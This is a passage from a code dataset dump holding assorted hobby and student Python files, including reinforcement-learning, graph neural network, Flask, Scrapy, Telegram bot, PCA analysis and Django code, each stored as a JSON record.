RandomAgent:\n\tdef __init__(self, actions):\n\t\tself.actions = actions\n\n\tdef pickAction(self, state, reward):\n\t\treturn random.choice(self.actions)\n'''\nState Formate:\n{\n 'player_x': int,\n 'player_vel': float,\n 'fruit_x': int,\n 'fruit_y': int\n}\nActions:\n[97, 100, None]\n'''\n\ngame = Catcher(width=256, height=256, init_lives=3)\n\np = PLE(game, fps=30, display_screen=True, force_fps=False)\np.init()\n\nagent = RandomAgent(p.getActionSet())\nnb_frames = 1000\nreward = 0.0\n\n# controllers\nrewards = {\n\t'positive': 0,\n\t'negative': 0,\n\t'tick': 0,\n}\n\n# Set data\nq = pd.DataFrame(columns=['player_x','player_vel','fruit_x','fruit_y','action','reward'])\n\nprint(game.getGameState())\nprint(p.getActionSet())\n\n# for f in range(nb_frames):\nwhile rewards['positive'] < 50 or rewards['negative'] < 50:\n\tif p.game_over(): #check if the game is over\n\t\tp.reset_game()\n\n\tstate = game.getGameState()\n\taction = agent.pickAction(state, reward)\n\treward = p.act(action)\n\n\tif float(reward) == 1.0 or float(reward) == -1.0: # concat only positive and negative rewards\n\n\t\tnewQ = pd.DataFrame([[\n\t\t\tint(state['player_x']),\n\t\t\tfloat(state['player_vel']),\n\t\t\tint(state['fruit_x']),\n\t\t\tint(state['fruit_y']),\n\t\t\taction,float(reward)\n\t\t\t]], columns=list(q))\n\n\t\tif reward == 1.0:\n\t\t\trewards['positive'] += 1\n\t\telif reward == -1.0:\n\t\t\trewards['negative'] += 1\n\t\telif reward == 0.0:\n\t\t\treward['tick'] += 1\n\n\t\tq = pd.concat([q,newQ], ignore_index=True)\n\n\npositive = q['reward'] == 1.0\nnegative = q['reward'] == -1.0\ntick = q['reward'] == 0.0\n\nq_positive = q[positive]\nq_negative = q[negative]\nq_tick = q[tick]\n\nprint(len(q))\n\n# Plot\nplt.scatter(x=q_positive['player_x'], y=q_positive['fruit_x'])\nplt.scatter(x=q_negative['player_x'], y=q_negative['fruit_x'])\nplt.show()\n","sub_path":"04_ReinforcementLearning/agents/Catcher.py","file_name":"Catcher.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644793983","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n# Use already implemented GCN\nfrom torch_geometric.nn import GCNConv, GATConv\n\n\nclass 
GCN(nn.Module):\n\t\"\"\"\n\tConstruct a GNN from stacked GCN blocks (input, hidden and output layers)\n\t\"\"\"\n\tdef __init__(self, input_dim, hidden_dim, output_dim, dropout):\n\t\tsuper(GCN, self).__init__()\n\n\t\tself.dropout = dropout\n\t\tself.conv_in = GCNConv(input_dim, hidden_dim[0])\n\t\t# nn.ModuleList registers the hidden blocks as sub-modules so their parameters are trained\n\t\tself.conv = nn.ModuleList([GCNConv(hidden_dim[i-1], hidden_dim[i]) for i in range(1,len(hidden_dim))])\n\t\tself.conv_out = GCNConv(hidden_dim[-1], output_dim)\n\n\tdef forward(self, x, edge_index):\n\t\tx = F.relu(self.conv_in(x, edge_index))\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\n\t\tfor block in self.conv:\n\t\t\tx = F.relu(block(x, edge_index))\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\n\t\tx = self.conv_out(x, edge_index)\n\n\t\treturn F.log_softmax(x, dim=1)\n\n\nclass GAT(nn.Module):\n\tdef __init__(self, input_dim, hidden_dim, output_dim, dropout, n_heads):\n\t\tsuper(GAT, self).__init__()\n\t\tself.dropout = dropout\n\n\t\tself.conv_in = GATConv(input_dim, hidden_dim[0], heads=n_heads[0], dropout=self.dropout)\n\t\t# as above, a plain Python list would hide these layers from the optimizer\n\t\tself.conv = nn.ModuleList([GATConv(hidden_dim[i-1] * n_heads[i-1], hidden_dim[i], heads=n_heads[i], dropout=self.dropout) for i in range(1,len(n_heads)-1)])\n\t\tself.conv_out = GATConv(hidden_dim[-1] * n_heads[-2], output_dim, heads=n_heads[-1], dropout=self.dropout, concat=False)\n\n\tdef forward(self, x, edge_index, att=None):\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\n\t\tif att: # if we want to see attention weights\n\t\t\tx, alpha = self.conv_in(x, edge_index, return_attention_weights=att)\n\t\t\tx = F.elu(x)\n\n\t\t\tfor attention in self.conv:\n\t\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\t\tx = F.elu(attention(x, edge_index))\n\t\t\t\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\tx, alpha2 = self.conv_out(x, edge_index, return_attention_weights=att)\n\t\t\n\t\t\treturn F.log_softmax(x, dim=1), alpha, alpha2\n\t\t\n\t\telse: \n\t\t\tx = self.conv_in(x, edge_index)\n\t\t\tx = F.elu(x)\n\n\t\t\tfor attention in self.conv:\n\t\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\t\tx = F.elu(attention(x, edge_index))\n\t\t\t\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\tx = self.conv_out(x, edge_index)\n\t\t\n\t\t\treturn F.log_softmax(x, dim=1)\n","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"28443511","text":"import glob\nimport argparse\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom os import path, makedirs\nfrom env import *\nfrom utils import load_test_image, load_mask, rgb2hsv, pb_predict_mask, pct_to_label, R_squared, visualize\nmodel_path = \"./models/model_cloud_seg_e2e.pb\"\n\nwith tf.gfile.GFile(model_path, \"rb\") as f:\n    graph_def = tf.GraphDef()\n    graph_def.ParseFromString(f.read())\n\nwith tf.Graph().as_default() as graph:\n    tf.import_graph_def(graph_def)\n\nsess = tf.Session(graph=graph)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target_ds\")\nargs = parser.parse_args()\n\nprint(\"model loaded.\")\n\nd_img = path.join(args.target_ds,\"images\")+\"/*\"\nd_mask = path.join(args.target_ds, \"masks\")+\"/*\"\nimg_paths = sorted(glob.glob(d_img))\nmask_paths = sorted(glob.glob(d_mask))\n\n\nj, wrong_count = 0,0\ny_pred, y_true = [], []\nprint(img_paths)\nfor img_path, mask_path in zip(img_paths, mask_paths):\n\n    img = load_test_image(img_path, dsize = 
(IMG_HEIGHT, IMG_WIDTH))\n img_hsv = rgb2hsv(img, normalization = True) \n mask = pb_predict_mask(sess, img) > CLOUD_THRES\n #mask = pb_predict_window_mask(sess, img_hsv, window_size = SLIDING_WINDOW_SIZE) > CLOUD_THRES\n #mask = np.zeros_like(img_hsv[...,0])\n mask_pct = np.sum(mask)/(mask.shape[0]*mask.shape[1])*100\n gt_mask = load_mask(mask_path, dsize = (IMG_HEIGHT, IMG_WIDTH))/255.0 > CLOUD_THRES\n gt_mask_pct = np.sum(gt_mask)/(gt_mask.shape[0]*gt_mask.shape[1])*100\n y_pred.append(mask_pct)\n y_true.append(gt_mask_pct)\n \n if pct_to_label(mask_pct) != pct_to_label(gt_mask_pct):\n wrong_count +=1\n print(\"Wrong Prediction. {} has around {}% of sky area. Predicted:{}%\".format(img_path, PCT_LVL[pct_to_label(gt_mask_pct)], PCT_LVL[pct_to_label(mask_pct)]))\n print(\"More info on unsampled pct. GT:{}% Predicted:{}%\".format(gt_mask_pct, mask_pct))\n \n if not path.exists('./results_cloud'):\n makedirs('./results_cloud')\n visualize(img, mask, path = \"./results_cloud/\"+img_path.split(\"/\")[-1].split(\".\")[0]+\"_pred.jpg\" )\n j+=1\n","sub_path":"cloud_demo.py","file_name":"cloud_demo.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343851988","text":"\"\"\"empty message\n\nRevision ID: 916187b6841e\nRevises: \nCreate Date: 2020-04-20 22:10:38.984706\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '916187b6841e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('stations', sa.Column('rotation', sa.String(length=80), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('stations', 'rotation')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/916187b6841e_.py","file_name":"916187b6841e_.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"545416218","text":"from api.method import send_message\nfrom utils import filters, message_utils\n\nimport random\n\nvalue_error_text = 'Arguments must be positive integers.'\nhelp_text = 'No arguments: *random number* from 1 to 9.\\n1 argument: from 1 to argument.\\n' \\\n '2 arguments: from 1st argument to 2nd.'\n\n\ndef handler(update):\n message = update.message\n text = message_utils.get_text_or_caption(message)\n if not text:\n return\n params = filters.command(text, 'rand')\n\n if params is not None:\n result = None\n if params == []:\n result = random.randint(1, 9)\n\n elif params[0] == 'help':\n result = help_text\n\n elif len(params) == 1:\n try:\n result = random.randint(1, int(params[0]))\n except ValueError:\n result = value_error_text\n\n elif len(params) == 2:\n try:\n result = random.randint(int(params[0]), int(params[1]))\n except ValueError:\n result = value_error_text\n \n if result:\n send_message(message.chat.id, result, parse_mode='Markdown')\n return True\n","sub_path":"handlers/rng.py","file_name":"rng.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388711145","text":"# -*- coding: utf-8 -*-\n__author__ = \"Bellini Gianni \"\n__version__ = \"02.01 2018-10-10\"\n\nimport sqlite3 as lite\nimport sys\n\nif __name__ == (\"__main__\"):\n file1 = open(\"classi_considerate.TXT\",\"r\")\n stringa = file1.readline()\n stringaSplit = \"\"\n classi = []\n classiAss = []\n while(stringa != \"\"):\n stringaSplit = stringa.split(\";\")\n classi.append(stringaSplit[0])\n stringa = file1.readline()\n\n i = 0\n u = 0\n cont = 0\n\n while (i < 12):\n classiAss.append(str(classi[0]))\n stringa3 = str(classi[0])\n classi.remove(stringa3)\n stringa3 = \"\"\n u += 1\n if(u > 3):\n print(classiAss)\n stringa3 = str(classiAss[cont])\n classi.append(stringa3)\n cont += 1\n i += 1\n print(classiAss)\n\n try:\n con = lite.connect(\"scrutini.db\")\n cur = con.cursor()\n cur = con.execute(\"SELECT sigla FROM Aule\")\n dat = cur.fetchall()\n print(dat)\n\n except lite.Error as e:\n print(\"ciao\")\n","sub_path":"classi.py","file_name":"classi.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448607064","text":"\"\"\"Basic RESTFUL API as defined in https://flask-restful.readthedocs.io/en/latest/quickstart.html.\"\"\"\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask_restful import reqparse, abort, Api, Resource\n\napp = Flask(__name__)\nCORS(app)\napi = Api(app)\n\n# TODOS = {\n# 'todo1': {'task': 'build an API'},\n# 'todo2': {'task': '?????'},\n# 'todo3': {'task': 'profit!'},\n# }\n\nuser_list = [\n {\n 'name': 'test user',\n 'email': 'test@f.c'\n },\n {\n 'name': 'mark mccorkle',\n 'email': 'mark@f.c'\n },\n {\n 'name': 'other user',\n 'email': 'ou@test.dom'\n }\n]\n\norganizations = ['Organization Foo', 'Organization Bar']\n\n\n# def abort_if_todo_doesnt_exist(todo_id):\n# if todo_id not in TODOS:\n# abort(404, message=\"Todo {} doesn't exist\".format(todo_id))\n\n\n# parser = reqparse.RequestParser()\n# parser.add_argument('task')\n\n\n# Todo\n# shows a single todo item and 
lets you delete a todo item\n# class Todo(Resource):\n#     def get(self, todo_id):\n#         abort_if_todo_doesnt_exist(todo_id)\n#         return TODOS[todo_id]\n\n#     def delete(self, todo_id):\n#         abort_if_todo_doesnt_exist(todo_id)\n#         del TODOS[todo_id]\n#         return '', 204\n\n#     def put(self, todo_id):\n#         args = parser.parse_args()\n#         task = {'task': args['task']}\n#         TODOS[todo_id] = task\n#         return task, 201\n\n# # TodoList\n# # shows a list of all todos, and lets you POST to add new tasks\n# class TodoList(Resource):\n#     def get(self):\n#         return TODOS\n\n#     def post(self):\n#         args = parser.parse_args()\n#         todo_id = int(max(TODOS.keys()).lstrip('todo')) + 1\n#         todo_id = 'todo%i' % todo_id\n#         TODOS[todo_id] = {'task': args['task']}\n#         return TODOS[todo_id], 201\n\n\nclass User(Resource):\n    \"\"\"All users CRUD.\"\"\"\n\n    def get(self, user_id):\n        \"\"\"Get this user ID.\"\"\"\n        return user_list[user_id]\n\n    def post(self):\n        \"\"\"Create a new user.\"\"\"\n        print('WARNING: STUB for User.post')\n        return False\n\n    def delete(self, user_id):\n        \"\"\"Mark a user as deleted.\"\"\"\n        print('WARNING: STUB for User.delete')\n        return False\n\n    def put(self, user_id):\n        \"\"\"Update an existing User.\"\"\"\n        print('WARNING: STUB for User.put')\n        return False\n\n\nclass Users(Resource):\n    \"\"\"GET for a list of all users.\"\"\"\n\n    def get(self, substring=None):\n        \"\"\"Return the list of users, optionally filtered by substring.\"\"\"\n        # TODO: apply substring to user list, only return substring\n        # TODO: apply security filter for asking user context.\n        return user_list\n\n\nclass Organizations(Resource):\n    \"\"\"Getter for organization list.\"\"\"\n\n    def get(self):\n        \"\"\"Get all organizations.\"\"\"\n        return organizations\n\n\napi.add_resource(User, '/user/')\napi.add_resource(Users, '/users')\napi.add_resource(Organizations, '/organizations')\n\n# example endpoints\n# api.add_resource(TodoList, '/todos')\n# api.add_resource(Todo, '/todos/')\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"92811940","text":"\"\"\"\n    This spider is a GameLoft spider created on top of the ATSSpider\n    scrapy crawl gameloft -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.gameloft.com/corporate/jobs/apply\"\n\n    sample job url:\n    http://www.gameloft.com/corporate/jobs/job-apply-details/73/?group=80&job=4099&loc=58&applyby=categ\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin\n\n\nclass GameLoft(ATSSpider):\n\n    name = \"gameloft\"\n    Ref_Num = compile(r\"&job=(\\d+)\")\n    Group_Num = compile(r\"group=(\\d+)\")\n    Countries_List = compile(r'arrCountries\\s*=\\s*\"(.*)\";')\n\n    def parse(self, response):\n        selector = Selector(response)\n        categories = selector.xpath(\n            '//div[@class=\"j-a-category-list\"]/ul/li/a'\n        )\n        for category in categories:\n            category_url = category.xpath('./@href').extract()\n            if category_url:\n                yield Request(\n                    callback=self.parse_countrylist,\n                    meta={\n                        'jobcategory': category.xpath('./p/text()').extract(),\n                        # pull the numeric group id out of the category URL\n                        'group_num': self.Group_Num.search(category_url[0]).group(1),\n                    },\n                    url=category_url[0]\n                )\n\n    def parse_countrylist(self, response):\n        selector = Selector(response)\n        countries_list = selector.xpath(\n            '//script//text()').re(self.Countries_List)\n        if 
countries_list:\n            yield FormRequest(\n                callback=self.parse_jobslist,\n                formdata={\n                    'listOfCountries': countries_list[0],\n                    'groupDetails': response.meta.get('group_num'),\n                },\n                meta={'jobcategory': response.meta.get('jobcategory', '')},\n                url=response.url\n            )\n\n    def parse_jobslist(self, response):\n        selector = Selector(response)\n        jobs = selector.xpath(\n            '//ul[@class=\"mobileJobIndicator\"]/li/a/@href').extract()\n        for job in jobs:\n            req = Request(\n                callback=self.parse_job_callback(),\n                meta={'jobcategory': response.meta.get('jobcategory', '')},\n                url=job\n            )\n            yield req\n\n    def parse_job(self, response):\n        selector = Selector(response)\n\n        loader = BrightcorpItemLoader(selector=selector)\n\n        desc_xpath = '//div[@class=\"set\"]/h4[text()=\"%s\"]/following-sibling::node()'\n\n        details = selector.xpath('//h1[@class=\"job-det\"]/text()').extract()\n        if details:\n            details = details[0].split('-')\n            if len(details) == 2:\n                loader.add_value('location', details[-1])\n            elif len(details) == 3:\n                loader.add_value(\n                    'location', [details[1], details[-1]], NormalizedJoin(\", \")\n                )\n\n        loader.add_xpath('benefits', desc_xpath % 'Why Join Us', NormalizedJoin())\n        loader.add_xpath('description', desc_xpath % 'ABOUT THE JOB')\n        loader.add_xpath('requirements', desc_xpath % 'PROFILE')\n        loader.add_xpath('title', '//span[@class=\"job-title\"]/text()')\n\n        loader.add_value(\n            'referencenumber', response.url,\n            Prefix('%s-' % self.name), re=self.Ref_Num\n        )\n        loader.add_value('jobcategory', response.meta.get('jobcategory'))\n        loader.add_value('url', response.url)\n\n        yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/gameloft.py","file_name":"gameloft.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112495558","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/03/26 16:14\n# @Author : zhouwentao\nfrom app.main.pipe_factory.dao.delivery_item_dao import delivery_item_dao\nfrom app.main.pipe_factory.dao.delivery_sheet_dao import delivery_sheet_dao\nfrom app.main.pipe_factory.entity.delivery_sheet import DeliverySheet\nfrom app.main.pipe_factory.entity.delivery_item import DeliveryItem\nfrom app.util.uuid_util import UUIDUtil\n\n\ndef generate_sheets(sheets):\n    \"\"\"Generate the corresponding delivery notice sheets from the JSON data\"\"\"\n    sheets_list = []\n    for sheet in sheets:\n        delivery_sheet = DeliverySheet(sheet)\n        for index in range(len(delivery_sheet.items)):\n            delivery_sheet.items[index] = DeliveryItem(delivery_sheet.items[index])\n        sheets_list.append(delivery_sheet)\n\n    return sheets_list\n\n\ndef save_sheets(result_list):\n    \"\"\"Assign generated delivery and item ids to each sheet, then batch-insert sheets and items\n\n    :param result_list:\n    :return:\n    \"\"\"\n    items = list()\n    for i in result_list:\n        i.delivery_no = UUIDUtil.create_id(\"de\")\n        for j in i.items:\n            j.delivery_no = i.delivery_no\n            j.delivery_item_no = UUIDUtil.create_id(\"di\")\n        items.extend(i.items)\n    delivery_sheet_dao.batch_insert(result_list)\n    delivery_item_dao.batch_insert(items)\n","sub_path":"app/main/pipe_factory/service/sheet_service.py","file_name":"sheet_service.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134597546","text":"######################################################################################################\n# import libraries\n######################################################################################################\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.decomposition import 
PCA\n\n\n######################################################################################################\n# def functions\n######################################################################################################\ndef vec_density(d):\n d_for_hist = d * 10 ** precision\n hist = np.zeros(int(np.max(d_for_hist)) + 1)\n for val in d_for_hist:\n hist[int(val)] += 1\n return hist / np.sum(hist)\n\n\ndef entropy(fx):\n tmp = []\n for trial in np.arange(0, len(fx), 1):\n if fx[trial] == 0:\n tmp += [0]\n else:\n tmp += [-1 * fx[trial] * np.log2(fx[trial])]\n return np.sum(tmp)\n\n\ndef analyze_data(data):\n trials, features = np.shape(data)\n # calc variance\n var_data = np.var(data, axis=0)\n # calc entropy\n entropy_data_features = np.zeros(features)\n for feature in np.arange(0, features, 1):\n fx = vec_density(data[:, feature])\n entropy_data_features[feature] = entropy(fx)\n return var_data, entropy_data_features\n\n\n######################################################################################################\n# gaussian data\n######################################################################################################\n# create data\ntrials = 1000\nfeatures = 10\nprecision = 2\nm = 1000\nmean = np.array([m, m, m, m, m, m, m, m, m, m])\nc = 0 # no correlation between any two features!\n\nfor (v1, v2, v3, v4) in [(1, 1, 1, 1), (1, 10, 80, 200)]:\n\n cov = np.array([\n [v1, c, c, c, c, c, c, c, c, c],\n [c, v1, c, c, c, c, c, c, c, c],\n [c, c, v1, c, c, c, c, c, c, c],\n [c, c, c, v3, c, c, c, c, c, c],\n [c, c, c, c, v3, c, c, c, c, c],\n [c, c, c, c, c, v4, c, c, c, c],\n [c, c, c, c, c, c, v4, c, c, c],\n [c, c, c, c, c, c, c, v2, c, c],\n [c, c, c, c, c, c, c, c, v2, c],\n [c, c, c, c, c, c, c, c, c, v2],\n ])\n\n data = np.transpose(np.round(np.random.multivariate_normal(mean, cov, trials).T, decimals=precision))\n\n ### before PCA - var and entropy\n var_data, entropy_data_features = analyze_data(data)\n var_data_sum = np.sum(var_data)\n entropy_data_features_sum = np.sum(entropy_data_features)\n var_data_sorted_neg, entropy_data_features_sorted = (list(t) for t in\n zip(*sorted(zip(-var_data, entropy_data_features))))\n var_data_sorted = -np.array(var_data_sorted_neg)\n\n ### after PCA - var and entropy\n pca = PCA(n_components=features)\n principalComponents = pca.fit(data)\n data_projected = pca.transform(data)\n var_data_projected, entropy_data_projected_features = analyze_data(data_projected)\n var_data_projected_sum = np.sum(var_data_projected)\n entropy_data_projected_features_sum = np.sum(entropy_data_projected_features)\n\n print(\"entropy before PCA:\", entropy_data_features_sum)\n print(\"variance before PCA:\", var_data_sum)\n print(\"entropy after PCA:\", entropy_data_projected_features_sum)\n print(\"variance after PCA:\", var_data_projected_sum)\n\n ### plotting the variance and the entropy by features, variance-sorted\n features_vec = np.arange(0, 10, 1)\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('feature')\n ax1.set_ylabel('variance')\n ax1.plot(features_vec, var_data_sorted, color=\"red\", marker='o', label=\"variance-before\")\n ax1.plot(features_vec, var_data_projected, color=\"red\", marker='D', label=\"variance-after\")\n ax1.tick_params(axis='y', labelcolor=\"red\")\n ax1.legend(loc=0)\n\n ax2 = ax1.twinx() # shared x axis.\n ax2.set_ylabel('entropy[bits]')\n ax2.plot(features_vec, entropy_data_features_sorted, color=\"blue\", marker='o', label=\"entropy-before\")\n ax2.plot(features_vec, entropy_data_projected_features, 
color=\"blue\", marker='D', label=\"entropy-after\")\n ax2.tick_params(axis='y', labelcolor=\"blue\")\n ax2.legend(loc=3)\n\n plt.title(\n \"Variance and Entropy for variance-sorted features\\n before and after PCA, for (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.show()\n\n ### plotting entropy as a function of variance\n plt.scatter(var_data_sorted, entropy_data_features_sorted, marker=\"o\", label=\"before\")\n plt.scatter(var_data_projected, entropy_data_projected_features, marker=\"o\", label=\"after\")\n plt.title(\"Entropy as a function of variance before and after PCA,\\nfor (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.xlabel(\"variance\")\n plt.ylabel(\"entropy[bits]\")\n plt.legend()\n plt.show()\n\n ### plotting the accomulating variance and entropy over features, variance-sorted\n entropy_before_sum = []\n entropy_after_sum = []\n variance_before_sum = []\n variance_after_sum = []\n for i in np.arange(1, features + 1, 1):\n entropy_before_sum += [np.sum(entropy_data_features_sorted[0:i])]\n entropy_after_sum += [np.sum(entropy_data_projected_features[0:i])]\n variance_before_sum += [np.sum(var_data_sorted[0:i])]\n variance_after_sum += [np.sum(var_data_projected[0:i])]\n\n features_vec = np.arange(0, 10, 1)\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('feature')\n ax1.set_ylabel('variance')\n ax1.plot(features_vec, variance_before_sum, color=\"red\", marker='o', label=\"variance-before\")\n ax1.plot(features_vec, variance_after_sum, color=\"red\", marker='D', label=\"variance-after\")\n ax1.tick_params(axis='y', labelcolor=\"red\")\n ax1.legend(loc=2)\n\n ax2 = ax1.twinx() # shared x axis.\n ax2.set_ylabel('entropy')\n ax2.plot(features_vec, entropy_before_sum, color=\"blue\", marker='o', label=\"entropy-before\")\n ax2.plot(features_vec, entropy_after_sum, color=\"blue\", marker='D', label=\"entropy-after\")\n ax2.tick_params(axis='y', labelcolor=\"blue\")\n ax2.legend(loc=4)\n\n plt.title(\n \"Accomulating variance-sum and entropy-sum for variance-sorted\\nfeatures before and after PCA, for (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.show()\n","sub_path":"PCA_entropy.py","file_name":"PCA_entropy.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118137576","text":"import argparse\nfrom typing import Optional\n\nimport core\nimport soundfile\n\nfrom forwarder import Forwarder\n\n\ndef run(\n use_gpu: bool,\n text: str,\n speaker_id: int,\n f0_speaker_id: Optional[int],\n f0_correct: float,\n) -> None:\n # コアの初期化\n core.initialize(\"./\", use_gpu)\n\n # 音声合成処理モジュールの初期化\n forwarder = Forwarder(\n yukarin_s_forwarder=core.yukarin_s_forward,\n yukarin_sa_forwarder=core.yukarin_sa_forward,\n decode_forwarder=core.decode_forward,\n )\n\n # 音声合成\n wave = forwarder.forward(\n text=text,\n speaker_id=speaker_id,\n f0_speaker_id=f0_speaker_id if f0_speaker_id is not None else speaker_id,\n f0_correct=f0_correct,\n )\n\n # 保存\n soundfile.write(f\"{text}-{speaker_id}.wav\", data=wave, samplerate=24000)\n\n core.finalize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_gpu\", action=\"store_true\")\n parser.add_argument(\"--text\", required=True)\n parser.add_argument(\"--speaker_id\", type=int, required=True)\n parser.add_argument(\"--f0_speaker_id\", type=int)\n 
parser.add_argument(\"--f0_correct\", type=float, default=0)\n run(**vars(parser.parse_args()))\n","sub_path":"example/python/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435298769","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'sobolevn'\n\nDEBUG = True\nSECRET_KEY = 'asdfsdfssf asf dsgsdg'\nUPLOAD_FOLDER = 'upload/avatar'\n#WTF_CSRF_ENABLED = False\n\n#file uploader setting\n#UPLOADED_PHOTOS_DEST = 'upload/avatar'\n#UPLOADED_FILES_ALLOW = ('png', 'jpg', 'gif')\n#MAX_CONTENT_LENGTH = 16 * 1024 * 1024\n\n","sub_path":"project9/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129410667","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 24 23:04:52 2017\n\n@author: Adwait\n\"\"\"\n\nprint('Please think of a number between 0 and 100!')\nm=50\nl1=0\nl2=100\ng='a'\nwhile g!='c':\n print('Is your secret number ', int(m),'?')\n g=input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly.\")\n if g=='h':\n l2=m\n elif g=='l':\n l1=m\n elif g!='c':\n print('You should enter h, l or c. Please reenter.')\n m=int(l1/2+l2/2)\n if l1==l2:\n print(\"Your No is %d\"%m)\n break\nprint('Game over. Your secret number was: ', int(m))\n\n\n","sub_path":"bisection no guess game.py","file_name":"bisection no guess game.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559211974","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.template.loader import render_to_string\nfrom django.views.generic import ListView\nfrom django.contrib.auth.forms import UserCreationForm\nfrom rooms import models as rooms_models\nfrom django.shortcuts import render,redirect\nfrom rooms import forms as rooms_forms\nfrom django.contrib import messages\nfrom django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom rooms.models import CrudUser\nfrom rooms.models import Room, Emptyroom,Events\nfrom django.utils import timezone\nfrom rooms.forms import EventForm \nfrom django.db.models import Q\nfrom wsgiref.util import FileWrapper\nfrom django.contrib.auth import login, authenticate\nfrom django.shortcuts import render, redirect, get_object_or_404, HttpResponseRedirect,Http404\t\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom .tokens import account_activation_token\nfrom django.template.loader import render_to_string\nfrom .forms import SignUpForm,CreateUserForm,UserUpdateForm,ProfileUpdateForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib import messages\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST,\n request.FILES,\n 
